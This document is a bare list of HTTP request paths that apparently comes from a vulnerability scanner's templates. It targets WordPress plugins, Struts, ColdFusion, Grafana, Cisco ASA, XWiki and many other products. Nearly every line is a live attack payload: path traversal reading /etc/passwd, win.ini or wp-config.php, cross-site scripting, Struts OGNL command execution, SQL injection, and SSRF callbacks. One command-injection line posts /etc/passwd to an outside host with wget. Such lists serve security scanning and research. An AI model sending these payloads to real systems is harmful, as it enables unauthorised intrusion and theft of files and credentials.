/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search
/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search
/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/adm/file.cgi?next_file=%2fetc%2fpasswd
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/?q=node&destination=node
/login/../../../etc/passwd
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/wp-content/plugins/wsecure/wsecure-config.php
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/cgi-bin/;cat$IFS/etc/passwd
/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/%5C../ssl/yaws-key.pem
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/.env
/passwordrecovered.cgi?id={{rand_base(5)}}
/struts2-rest-showcase/orders/3
/orders/3
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/meta
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/debug/pprof/
/debug/pprof/goroutine?debug=1
/LetsEncrypt/Index?fileName=/etc/passwd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/cgi-bin/config.exp
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/api-third-party/download/extdisks../etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/ReportServer/Pages/ReportViewer.aspx
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/v2/api/product/manger/getInfo
/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/config/getuser?index=0
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/wp-json/wp/v2/lesson/1
/api/settings/values
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/wp-content/plugins/easy-wp-smtp/
/wp-content/plugins/wp-mail-smtp-pro/
/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/wp-admin/index.php?download-lp-users=yes
/os/mxperson
/meaweb/os/mxperson
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(
/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/wp-admin/admin-ajax.php
/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/api/userrolelist/systemRoles?require-cfg.js
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
/js/log.js
/jeecg-boot/sys/user/querySysUser?username=admin
/api/snapshots/:key
/dashboard/snapshot/:key
/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/geoserver/
/files.md5
/testrail/files.md5
/api/geojson?url=file:///etc/passwd
/api/geojson?url=file:///c://windows/win.ini
/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR
/{{route}}
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
/apply.cgi
/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/module/api.php?mobile/webNasIPS
/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1
/wp-content/dup-installer/main.installer.php?is_daws=1
/js/zimbraMail/share/model/ZmSettings.js
/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd
/cgi-bin/ExportAllSettings.sh
/admin/requests/take_action.php?id=6
/?doAs=`{{url_encode(
/
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/pentaho/Login
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js
/wp-json/download-monitor/v1/user_data
/ExportReportingManager.aspx
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}

/cgi-bin/ExportLogs.sh
/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/v1/avatars/favicon?url=http://{{interactsh-url}}
/tshirtecommerce/ajax.php?type=svg
/tshirtecommerce/fonts.php?name=2&type=./../index.php
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd
/download/{{repeat(
/api/v1/slack/image/slack-image{{repeat(
/cgi-bin/exportCfgwithpasswd
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/api/sys/set_passwd
/opencms/cmisatom/cmis-online/query
/cmisatom/cmis-online/query
/lang/log/httpd.log
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-pro/tmp/
/%2e%2e/%2e%2e/etc/passwd
/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(
/static/../../../../etc/passwd
/device/config
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp
/interview?i=/etc/passwd
/position.js
/pictureproxy.php?url=file:///etc/passwd
/pictureproxy.php?url=http://{{interactsh-url}}
/index.php?rest_route=/wp/v2/pages&per_page=100
/?page_id={{search_page_id}}&type=tf_hotel&place=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&adults=2&children=1&room=1
/api/v1/confup?mode=&uid=1
/api/v1/confup?mode=lean&uid=1
/api/v1/ndconfig?mode=lean&uid=1
/api/v1/ndconfig?mode=&uid=1
/apply/index.php?url=http://{{interactsh-url}}
/static/link/%2e%2e/etc/passwd
/-/media/doo-doo.ashx
/rest/rights/
/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d
/adama/adama/downloadService?type=1&file=../../../../etc/passwd
/hx/resources/public/$SCHEMAS$?Filename=c%3a%5cwindows%5cwin.ini
/{{path}}
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/scim/v2/Users
/api/scim/v2/Users
/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.
/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName
{{path}}
/download_work_dir_file?path=/etc/passwd
/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg
/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false
/webapps/xwiki/WEB-INF/xwiki.properties
/geoserver/wfs?service=WMS&request=GetMap
/wfs?service=WMS&request=GetMap
/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
/api/modular-connector/login/{{string}}?origin=mo&type=foo
/user/login
/wp-json/igd/v1/get-users-data
